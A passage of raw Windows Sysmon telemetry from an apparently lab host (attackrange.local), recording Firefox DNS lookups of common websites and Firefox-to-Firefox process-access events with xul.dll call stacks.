Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 22542200x8000000000000000105629Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.398{58E9C193-B422-615A-0602-00000000FC01}5552www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:52.222.239.60;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105628Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.398{58E9C193-B422-615A-0602-00000000FC01}5552www.ebay.de0type: 5 slot11847.ebay.com.edgekey.net;type: 5 e11847.g.akamaiedge.net;::ffff:95.100.210.81;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105627Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 22542200x8000000000000000105626Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.398{58E9C193-B422-615A-0602-00000000FC01}5552www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:199.232.137.140;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105625Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 22542200x8000000000000000105624Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.395{58E9C193-B422-615A-0602-00000000FC01}5552star-mini.c10r.facebook.com02a03:2880:f11c:8183:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105623Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.395{58E9C193-B422-615A-0602-00000000FC01}5552youtube-ui.l.google.com02a00:1450:4001:80e::200e;2a00:1450:4001:830::200e;2a00:1450:4001:800::200e;2a00:1450:4001:801::200e;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105622Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+c0ff68|C:\Program Files\Mozilla Firefox\xul.dll+c102cd 22542200x8000000000000000105621Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.395{58E9C193-B422-615A-0602-00000000FC01}5552dyna.wikimedia.org02620:0:862:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 22542200x8000000000000000105619Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.384{58E9C193-B422-615A-0602-00000000FC01}5552youtube-ui.l.google.com0142.250.185.206;142.250.185.238;142.250.184.238;142.250.181.238;142.250.186.78;142.250.186.110;142.250.186.142;142.250.186.174;172.217.18.110;142.250.184.206;172.217.23.110;216.58.212.142;142.250.185.78;142.250.185.110;142.250.185.142;142.250.185.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105618Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.383{58E9C193-B422-615A-0602-00000000FC01}5552www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:142.250.185.174;::ffff:142.250.185.206;::ffff:142.250.185.238;::ffff:142.250.184.238;::ffff:142.250.181.238;::ffff:142.250.186.78;::ffff:142.250.186.110;::ffff:142.250.186.142;::ffff:142.250.186.174;::ffff:172.217.18.110;::ffff:142.250.184.206;::ffff:172.217.23.110;::ffff:216.58.212.142;::ffff:142.250.185.78;::ffff:142.250.185.110;::ffff:142.250.185.142;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105617Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+27cc59b|C:\Program Files\Mozilla Firefox\xul.dll+27bf686|C:\Program Files\Mozilla Firefox\xul.dll+c076aa|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2 22542200x8000000000000000105616Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.383{58E9C193-B422-615A-0602-00000000FC01}5552dyna.wikimedia.org091.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105615Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.383{58E9C193-B422-615A-0602-00000000FC01}5552star-mini.c10r.facebook.com0157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0dc1b|C:\Program Files\Mozilla Firefox\xul.dll+c069d2|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+c0ff68|C:\Program Files\Mozilla Firefox\xul.dll+c102cd 22542200x8000000000000000105613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.382{58E9C193-B422-615A-0602-00000000FC01}5552www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:91.198.174.192;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 22542200x8000000000000000105611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.382{58E9C193-B422-615A-0602-00000000FC01}5552www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:157.240.20.35;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b638f2|C:\Program Files\Mozilla Firefox\xul.dll+b7d7f3|C:\Program Files\Mozilla Firefox\xul.dll+b7d484|C:\Program Files\Mozilla Firefox\xul.dll+b7dcbc|C:\Program Files\Mozilla Firefox\xul.dll+f84252|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0|C:\Program Files\Mozilla Firefox\xul.dll+f1bb45|C:\Program Files\Mozilla Firefox\xul.dll+f1b6d4|C:\Program Files\Mozilla Firefox\xul.dll+f1b179 10341000x8000000000000000105609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b638f2|C:\Program Files\Mozilla Firefox\xul.dll+b7d7f3|C:\Program Files\Mozilla Firefox\xul.dll+b7d484|C:\Program Files\Mozilla Firefox\xul.dll+b7dcbc|C:\Program Files\Mozilla Firefox\xul.dll+f84252|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0|C:\Program Files\Mozilla Firefox\xul.dll+f1bb45|C:\Program Files\Mozilla Firefox\xul.dll+f1b6d4|C:\Program Files\Mozilla Firefox\xul.dll+f1b179 10341000x8000000000000000105608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b638f2|C:\Program Files\Mozilla Firefox\xul.dll+b7d7f3|C:\Program Files\Mozilla Firefox\xul.dll+b7d484|C:\Program Files\Mozilla Firefox\xul.dll+b7dcbc|C:\Program Files\Mozilla Firefox\xul.dll+f84252|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0|C:\Program Files\Mozilla Firefox\xul.dll+f1bb45|C:\Program Files\Mozilla Firefox\xul.dll+f1b6d4|C:\Program Files\Mozilla Firefox\xul.dll+f1b179 10341000x8000000000000000105607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.782{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b638f2|C:\Program Files\Mozilla Firefox\xul.dll+b7d7f3|C:\Program Files\Mozilla Firefox\xul.dll+b7d484|C:\Program Files\Mozilla Firefox\xul.dll+b7dcbc|C:\Program Files\Mozilla Firefox\xul.dll+f84252|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0|C:\Program Files\Mozilla Firefox\xul.dll+f1bb45|C:\Program Files\Mozilla Firefox\xul.dll+f1b6d4|C:\Program Files\Mozilla Firefox\xul.dll+f1b179 22542200x8000000000000000105606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.042{58E9C193-B422-615A-0602-00000000FC01}5552d1zkz3k4cclnv6.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.038{58E9C193-B422-615A-0602-00000000FC01}5552d1zkz3k4cclnv6.cloudfront.net013.32.29.86;13.32.29.25;13.32.29.38;13.32.29.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.806{58E9C193-B422-615A-0602-00000000FC01}5552dzlgdtxcws9pb.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.796{58E9C193-B422-615A-0602-00000000FC01}5552dzlgdtxcws9pb.cloudfront.net018.66.145.132;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.793{58E9C193-B422-615A-0602-00000000FC01}5552www.firefox.com0type: 5 fxc-prod.moz.works;type: 5 dzlgdtxcws9pb.cloudfront.net;::ffff:18.66.145.132;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:33.766{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla 